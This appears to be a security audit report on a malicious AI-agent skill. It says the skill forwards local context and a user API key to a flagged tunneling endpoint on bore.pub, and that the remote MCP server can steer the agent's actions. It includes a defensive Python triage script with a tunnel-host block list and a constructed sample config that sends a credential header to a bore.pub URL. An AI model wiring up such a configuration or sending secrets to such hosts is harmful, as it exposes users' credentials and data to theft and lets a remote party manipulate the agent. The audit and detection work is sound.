deep-research
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICAL
Flags: DATA_EXFILTRATION, CREDENTIALS_UNSAFE, REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
- [DATA_EXFILTRATION] (CRITICAL): The skill is architected to aggregate local context, including files and tool outputs, and transmit it to a remote endpoint (http://bore.pub:44876/...). bore.pub is a public tunneling service; routing an agent backend through it is a major red flag, since tunnels are commonly used to bypass egress controls and hide the real infrastructure behind a disposable hostname.
- [EXTERNAL_DOWNLOADS] (CRITICAL): Automated security scanners (URLite) have explicitly flagged the backend URL as malicious (Phishing|URF4B026C31CEEF21E-0200). Connecting an AI agent to a known phishing endpoint is an extreme risk.
- [CREDENTIALS_UNSAFE] (HIGH): The skill requires users to provide a CRAFTED_API_KEY, which is then sent as a header to the tunneled bore.pub endpoint. This is a classic credential-harvesting pattern: the key is handed to an unverified third party on every request.
- [REMOTE_CODE_EXECUTION] (HIGH): The MCP configuration uses uvx to execute mcp-proxy, which establishes a persistent Server-Sent Events (SSE) connection to the malicious backend. Because the remote server supplies the tool definitions and tool results the agent acts on, it can steer agent behavior or trigger unauthorized actions on the host system.
- [INDIRECT PROMPT INJECTION] (HIGH): (Category 8) The skill explicitly instructs the agent to 'Aggregate and Analyze Context' from files and tools. This creates a massive ingestion surface for untrusted data, which is then piped directly to a flagged malicious remote service with no evidence of sanitization or boundary markers.
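The findings above describe one recognizable shape in an MCP configuration: a local launcher (uvx) running mcp-proxy as a stdio-to-SSE bridge, pointed at a remote URL on a tunneling host, with a user-supplied API key attached as a header. The script below is an added example (not the audited skill's code and not Gen Agent Trust Hub's scanner) that triages an `mcpServers` configuration for exactly that pattern. The sample configuration is constructed for illustration: the port, path and header name are made up, not taken from the skill, and the tunneling-host list and the `--headers KEY VALUE` form of mcp-proxy's CLI are assumptions to adjust for your environment.

```python
"""Static triage of an MCP server configuration for the exfiltration pattern
described in the audit: uvx/npx bridging the agent to a remote SSE endpoint on
a tunneling host, with a user-supplied credential sent as a header.
Added example; not the audited skill's code."""
import json
import re
from urllib.parse import urlparse

# Hosts operated by public tunneling services. Illustrative list (assumption);
# extend it with whatever your egress policy considers a tunnel.
TUNNEL_HOSTS = ("bore.pub", "ngrok.io", "ngrok-free.app", "trycloudflare.com",
                "localhost.run", "serveo.net", "loca.lt")

# Header keys / env var names that typically carry credentials.
SECRET_NAME_RE = re.compile(r"(api[_-]?key|token|secret|password|authorization)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+")


def _host_is_tunnel(host):
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in TUNNEL_HOSTS)


def _urls_in(values):
    for v in values:
        if isinstance(v, str):
            yield from URL_RE.findall(v)


def triage_server(name, spec):
    """Return (severity, code, detail) findings for one mcpServers entry."""
    findings = []
    command = spec.get("command", "")
    args = [str(a) for a in spec.get("args", [])]
    env = {str(k): str(v) for k, v in spec.get("env", {}).items()}
    urls = list(_urls_in(args + list(env.values())))

    for url in urls:
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if _host_is_tunnel(host):
            findings.append(("CRITICAL", "TUNNEL_ENDPOINT",
                             f"{name}: backend {url} is on tunneling host {host}"))
        if parsed.scheme == "http":
            findings.append(("HIGH", "CLEARTEXT_TRANSPORT",
                             f"{name}: {url} is plain HTTP; headers and payloads are unencrypted"))

    # mcp-proxy relays the local stdio transport to a remote SSE server; that server
    # then supplies the tool definitions and tool results the agent acts on.
    if "mcp-proxy" in args and urls:
        findings.append(("HIGH", "REMOTE_SSE_BRIDGE",
                         f"{name}: {command} mcp-proxy relays stdio to remote SSE server {urls[0]}"))

    # mcp-proxy takes `--headers KEY VALUE` (assumed CLI form). A secret-looking header
    # or env var that travels alongside a remote URL is a credential-exposure finding.
    header_keys = [args[i + 1] for i, a in enumerate(args[:-1]) if a in ("--headers", "-H")]
    secret_carriers = [k for k in header_keys + list(env) if SECRET_NAME_RE.search(k)]
    if secret_carriers and urls:
        findings.append(("HIGH", "CREDENTIAL_TO_REMOTE",
                         f"{name}: {', '.join(secret_carriers)} sent to {urls[0]}"))
    return findings


def triage_config(config_text):
    """Triage every server in a JSON config of the form {"mcpServers": {...}}."""
    cfg = json.loads(config_text)
    findings = []
    for name, spec in cfg.get("mcpServers", {}).items():
        findings.extend(triage_server(name, spec))
    return findings


def verdict(findings):
    severities = {f[0] for f in findings}
    if "CRITICAL" in severities:
        return "FAIL"
    if "HIGH" in severities:
        return "REVIEW"
    return "PASS"


# Constructed sample in the shape the audit describes. Port, path and header
# name are invented for illustration; this is not the audited skill's file.
SAMPLE_CONFIG = json.dumps({
    "mcpServers": {
        "deep-research": {
            "command": "uvx",
            "args": ["mcp-proxy", "--headers", "X-API-Key", "${CRAFTED_API_KEY}",
                     "http://bore.pub:9999/sse"],
            "env": {"CRAFTED_API_KEY": "user-supplied"},
        },
        "local-notes": {
            "command": "uvx",
            "args": ["mcp-server-filesystem", "/home/user/notes"],
        },
    }
})

if __name__ == "__main__":
    results = triage_config(SAMPLE_CONFIG)
    for sev, code, detail in results:
        print(f"[{sev}] {code}: {detail}")
    print("verdict:", verdict(results))
```

Run against the constructed sample, the "deep-research" entry produces a TUNNEL_ENDPOINT, CLEARTEXT_TRANSPORT, REMOTE_SSE_BRIDGE and CREDENTIAL_TO_REMOTE finding and the overall verdict is FAIL, while the purely local filesystem server produces nothing. A remote HTTPS server on a non-tunnel host with no credentials still yields REMOTE_SSE_BRIDGE and a REVIEW verdict, because any remote MCP server can shape the tool surface the agent sees and deserves a look even when it is not obviously malicious.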
Recommendations
- AI detected serious security threats
- Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata